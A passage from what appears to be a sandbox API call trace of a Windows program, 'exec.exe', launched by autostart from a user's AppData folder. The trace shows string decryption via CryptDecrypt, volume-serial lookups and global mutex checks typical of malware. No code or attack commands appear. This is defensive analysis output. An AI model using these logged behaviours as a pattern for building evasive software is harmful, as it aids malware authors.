GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.630] SetLastError (dwErrCode=0x0) [0101.630] GetLastError () returned 0x0 [0101.631] SetLastError (dwErrCode=0x0) [0101.631] GetLastError () returned 0x0 [0101.631] SetLastError (dwErrCode=0x0) [0101.631] GetLastError () returned 0x0 [0101.631] SetLastError (dwErrCode=0x0) [0101.631] GetLastError () returned 0x0 [0101.631] SetLastError (dwErrCode=0x0) [0101.631] GetLastError () returned 0x0 [0101.631] SetLastError (dwErrCode=0x0) [0101.631] GetLastError () returned 0x0 [0101.631] SetLastError (dwErrCode=0x0) [0101.631] GetLastError () returned 0x0 [0101.631] SetLastError (dwErrCode=0x0) [0101.631] GetLastError () returned 0x0 [0101.631] SetLastError (dwErrCode=0x0) [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x9c) returned 0x1819f8 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x1f) returned 0x181aa0 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x36) returned 0x181ac8 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x37) returned 0x181b08 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x3c) returned 0x181b48 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x31) returned 0x181b90 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x17) returned 0x181bd0 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x24) returned 0x181bf0 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x14) returned 0x181c20 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0xd) returned 0x181c40 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x25) returned 0x181c58 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x39) returned 0x181c88 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x18) returned 0x181cd0 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x17) returned 0x181cf0 [0101.631] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0xe) returned 0x181d10 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x69) returned 0x181d28 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x3e) returned 0x181da0 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x1b) returned 0x181de8 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x1d) returned 0x181e10 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x48) returned 0x181e38 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x12) returned 0x181e88 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x18) returned 0x181ea8 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x1b) returned 0x181ec8 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x24) returned 0x181ef0 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x29) returned 0x181f20 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x1e) returned 0x181f58 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x41) returned 0x181f80 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x17) returned 0x181fd0 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x14) returned 0x181ff0 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0xf) returned 0x182010 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x16) returned 0x182028 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x2a) returned 0x182048 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x29) returned 0x182080 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x15) returned 0x1820b8 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x1e) returned 0x1820d8 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x2a) returned 0x182100 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x12) returned 0x182138 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x18) returned 0x182158 [0101.632] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x46) returned 0x182178 [0101.632] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1811f8 | out: hHeap=0x180000) returned 1 [0101.633] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0101.633] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x80) returned 0x1811f8 [0101.633] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1028136) returned 0x0 [0101.633] RtlSizeHeap (HeapHandle=0x180000, Flags=0x0, MemoryPointer=0x1811f8) returned 0x80 [0101.633] GetLastError () returned 0x0 [0101.633] SetLastError (dwErrCode=0x0) [0101.633] GetLastError () returned 0x0 [0101.633] SetLastError (dwErrCode=0x0) [0101.634] GetLastError () returned 0x0 [0101.634] SetLastError (dwErrCode=0x0) [0101.634] GetLastError () returned 0x0 [0101.634] SetLastError (dwErrCode=0x0) [0101.634] GetLastError () returned 0x0 [0101.634] SetLastError (dwErrCode=0x0) [0101.634] GetLastError () returned 0x0 [0101.634] SetLastError (dwErrCode=0x0) [0101.634] GetLastError () returned 0x0 [0101.634] SetLastError (dwErrCode=0x0) [0101.634] GetLastError () returned 0x0 [0101.634] SetLastError (dwErrCode=0x0) [0101.634] GetLastError () returned 0x0 [0101.634] SetLastError (dwErrCode=0x0) [0101.634] GetLastError () returned 0x0 [0101.634] SetLastError (dwErrCode=0x0) [0101.634] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.635] SetLastError (dwErrCode=0x0) [0101.635] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.636] GetLastError () returned 0x0 [0101.636] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.637] SetLastError (dwErrCode=0x0) [0101.637] GetLastError () returned 0x0 [0101.638] SetLastError (dwErrCode=0x0) [0101.638] GetLastError () returned 0x0 [0101.638] SetLastError (dwErrCode=0x0) [0101.638] GetLastError () returned 0x0 [0101.638] SetLastError (dwErrCode=0x0) [0101.638] GetLastError () returned 0x0 [0101.638] SetLastError (dwErrCode=0x0) [0101.638] GetLastError () returned 0x0 [0101.638] SetLastError (dwErrCode=0x0) [0101.638] GetLastError () returned 0x0 [0101.638] SetLastError (dwErrCode=0x0) [0101.638] GetLastError () returned 0x0 [0101.638] SetLastError (dwErrCode=0x0) [0101.638] GetLastError () returned 0x0 [0101.638] SetLastError (dwErrCode=0x0) [0101.638] GetLastError () returned 0x0 [0101.638] SetLastError (dwErrCode=0x0) [0101.638] GetLastError () returned 0x0 [0101.638] SetLastError (dwErrCode=0x0) [0103.263] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x30) returned 0x181280 [0103.263] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x3300) returned 0x1821c8 [0103.263] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x15c) returned 0x1812b8 [0103.263] GetTickCount () returned 0x5dd8 [0103.263] GetLastError () returned 0x0 [0103.263] SetLastError (dwErrCode=0x0) [0103.263] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x31fce0, cchData=32 | out: lpLCData="\x03") returned 16 [0103.264] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x1c) returned 0x181420 [0103.264] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x1c) returned 0x181448 [0103.265] GetVersion () returned 0x1db10106 [0103.265] GetCurrentProcess () returned 0xffffffff [0103.265] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x31fc44 | out: TokenHandle=0x31fc44*=0x80) returned 1 [0103.265] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x14, TokenInformation=0x31fc3c, TokenInformationLength=0x4, ReturnLength=0x31fc40 | out: TokenInformation=0x31fc3c, ReturnLength=0x31fc40) returned 1 [0103.265] CloseHandle (hObject=0x80) returned 1 [0103.265] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x20) returned 0x181470 [0103.265] CryptAcquireContextW (in: phProv=0x102fcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x102fcf0*=0x335098) returned 1 [0103.677] CryptImportKey (in: hProv=0x335098, pbData=0x31fb38, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x31fba0 | out: phKey=0x31fba0*=0x334c68) returned 1 [0103.677] CryptSetKeyParam (hKey=0x334c68, dwParam=0x1, pbData=0x31fb88, dwFlags=0x0) returned 1 [0103.677] CryptDecrypt (in: hKey=0x334c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x181470, pdwDataLen=0x31fb54 | out: pbData=0x181470, pdwDataLen=0x31fb54) returned 1 [0103.677] CryptDestroyKey (hKey=0x334c68) returned 1 [0103.677] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x1e) returned 0x181498 [0103.677] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x1e) returned 0x1814c0 [0103.677] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x90) returned 0x1814e8 [0103.677] CryptImportKey (in: hProv=0x335098, pbData=0x31fb10, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x31fb78 | out: phKey=0x31fb78*=0x334c68) returned 1 [0103.677] CryptSetKeyParam (hKey=0x334c68, dwParam=0x1, pbData=0x31fb60, dwFlags=0x0) returned 1 [0103.677] CryptDecrypt (in: hKey=0x334c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1814e8, pdwDataLen=0x31fb2c | out: pbData=0x1814e8, pdwDataLen=0x31fb2c) returned 1 [0103.677] CryptDestroyKey (hKey=0x334c68) returned 1 [0103.677] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1814e8 | out: hHeap=0x180000) returned 1 [0103.677] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x181498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0103.678] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1814c0 | out: hHeap=0x180000) returned 1 [0103.678] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x181470 | out: hHeap=0x180000) returned 1 [0103.686] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x31fbe0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x31fbe0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.687] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x181498 | out: hHeap=0x180000) returned 1 [0103.687] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x40) returned 0x181470 [0103.687] CryptImportKey (in: hProv=0x335098, pbData=0x31fb6c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x31fbd4 | out: phKey=0x31fbd4*=0x334c68) returned 1 [0103.687] CryptSetKeyParam (hKey=0x334c68, dwParam=0x1, pbData=0x31fbbc, dwFlags=0x0) returned 1 [0103.687] CryptDecrypt (in: hKey=0x334c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x181470, pdwDataLen=0x31fb88 | out: pbData=0x181470, pdwDataLen=0x31fb88) returned 1 [0103.687] CryptDestroyKey (hKey=0x334c68) returned 1 [0103.687] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x34) returned 0x1814b8 [0103.687] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0103.687] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x84 [0103.687] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x0 [0103.687] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x181470 | out: hHeap=0x180000) returned 1 [0103.687] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1814b8 | out: hHeap=0x180000) returned 1 [0103.687] ReleaseMutex (hMutex=0x84) returned 1 [0103.687] CloseHandle (hObject=0x84) returned 1 [0103.687] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x20) returned 0x181470 [0103.687] CryptImportKey (in: hProv=0x335098, pbData=0x31fb4c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x31fbb4 | out: phKey=0x31fbb4*=0x334c68) returned 1 [0103.687] CryptSetKeyParam (hKey=0x334c68, dwParam=0x1, pbData=0x31fb9c, dwFlags=0x0) returned 1 [0103.687] CryptDecrypt (in: hKey=0x334c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x181470, pdwDataLen=0x31fb68 | out: pbData=0x181470, pdwDataLen=0x31fb68) returned 1 [0103.687] CryptDestroyKey (hKey=0x334c68) returned 1 [0103.687] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x1e) returned 0x181498 [0103.687] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x1e) returned 0x1814c0 [0103.688] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x90) returned 0x1814e8 [0103.688] CryptImportKey (in: hProv=0x335098, pbData=0x31fb24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x31fb8c | out: phKey=0x31fb8c*=0x334c68) returned 1 [0103.688] CryptSetKeyParam (hKey=0x334c68, dwParam=0x1, pbData=0x31fb74, dwFlags=0x0) returned 1 [0103.688] CryptDecrypt (in: hKey=0x334c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1814e8, pdwDataLen=0x31fb40 | out: pbData=0x1814e8, pdwDataLen=0x31fb40) returned 1 [0103.688] CryptDestroyKey (hKey=0x334c68) returned 1 [0103.688] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1814e8 | out: hHeap=0x180000) returned 1 [0103.688] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x181498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0103.688] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1814c0 | out: hHeap=0x180000) returned 1 [0103.688] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x181470 | out: hHeap=0x180000) returned 1 [0103.688] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x31fbf4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x31fbf4*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.688] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x181498 | out: hHeap=0x180000) returned 1 [0103.688] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x40) returned 0x181470 [0103.688] CryptImportKey (in: hProv=0x335098, pbData=0x31fb80, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x31fbe8 | out: phKey=0x31fbe8*=0x334c68) returned 1 [0103.688] CryptSetKeyParam (hKey=0x334c68, dwParam=0x1, pbData=0x31fbd0, dwFlags=0x0) returned 1 [0103.688] CryptDecrypt (in: hKey=0x334c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x181470, pdwDataLen=0x31fb9c | out: pbData=0x181470, pdwDataLen=0x31fb9c) returned 1 [0103.688] CryptDestroyKey (hKey=0x334c68) returned 1 [0103.688] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x34) returned 0x1814b8 [0103.688] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x84 [0103.688] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x102 [0103.688] CloseHandle (hObject=0x84) returned 1 [0103.688] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x181470 | out: hHeap=0x180000) returned 1 [0103.688] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1814b8 | out: hHeap=0x180000) returned 1 [0103.689] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x181420 | out: hHeap=0x180000) returned 1 [0103.689] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x181448 | out: hHeap=0x180000) returned 1 [0103.689] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1812b8 | out: hHeap=0x180000) returned 1 [0103.689] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1821c8 | out: hHeap=0x180000) returned 1 [0103.689] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x181280 | out: hHeap=0x180000) returned 1 [0103.689] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0103.689] ExitProcess (uExitCode=0x0) [0103.689] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1807d0 | out: hHeap=0x180000) returned 1 Process: id = "13" image_name = "exec.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\exec.exe" page_root = "0x202fc000" os_pid = "0x558" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 88 os_tid = 0x55c [0102.358] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fef4 | out: lpSystemTimeAsFileTime=0x14fef4*(dwLowDateTime=0x44a6f860, dwHighDateTime=0x1d4f12b)) [0102.358] GetCurrentProcessId () returned 0x558 [0102.358] GetCurrentThreadId () returned 0x55c [0102.358] GetTickCount () returned 0x5a4f [0102.358] QueryPerformanceCounter (in: lpPerformanceCount=0x14feec | out: lpPerformanceCount=0x14feec*=6668358649) returned 1 [0102.358] GetStartupInfoW (in: lpStartupInfo=0x14fe98 | out: lpStartupInfo=0x14fe98*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x14fefc, hStdError=0x1028be4)) [0102.358] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0102.358] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0xb30000 [0102.360] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0102.360] GetProcAddress (hModule=0x76180000, lpProcName="FlsAlloc") returned 0x76194f2b [0102.360] GetProcAddress (hModule=0x76180000, lpProcName="FlsGetValue") returned 0x76191252 [0102.360] GetProcAddress (hModule=0x76180000, lpProcName="FlsSetValue") returned 0x76194208 [0102.360] GetProcAddress (hModule=0x76180000, lpProcName="FlsFree") returned 0x7619359f [0102.361] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x214) returned 0xb307d0 [0102.361] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0102.361] GetCurrentThreadId () returned 0x55c [0102.361] GetStartupInfoW (in: lpStartupInfo=0x14fe34 | out: lpStartupInfo=0x14fe34*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x10271aa, hStdOutput=0x10274e3, hStdError=0xb307d0)) [0102.361] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x800) returned 0xb309f0 [0102.361] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0102.361] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0102.361] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0102.361] SetHandleCount (uNumber=0x20) returned 0x20 [0102.361] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe\" " [0102.361] GetEnvironmentStringsW () returned 0x464770* [0102.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0102.362] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x581) returned 0xb311f8 [0102.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0xb311f8, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1409 [0102.362] FreeEnvironmentStringsW (penv=0x464770) returned 1 [0102.362] GetLastError () returned 0x5 [0102.362] SetLastError (dwErrCode=0x5) [0102.362] GetLastError () returned 0x5 [0102.362] SetLastError (dwErrCode=0x5) [0102.362] GetLastError () returned 0x5 [0102.362] SetLastError (dwErrCode=0x5) [0102.362] GetACP () returned 0x4e4 [0102.362] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x220) returned 0xb31788 [0102.362] GetLastError () returned 0x5 [0102.362] SetLastError (dwErrCode=0x5) [0102.362] IsValidCodePage (CodePage=0x4e4) returned 1 [0102.362] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdfc | out: lpCPInfo=0x14fdfc) returned 1 [0102.362] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f8c8 | out: lpCPInfo=0x14f8c8) returned 1 [0102.362] GetLastError () returned 0x5 [0102.363] SetLastError (dwErrCode=0x5) [0102.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14fcdc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14fcdc, cbMultiByte=256, lpWideCharStr=0x14f648, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鲧ĂĀ") returned 256 [0102.363] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 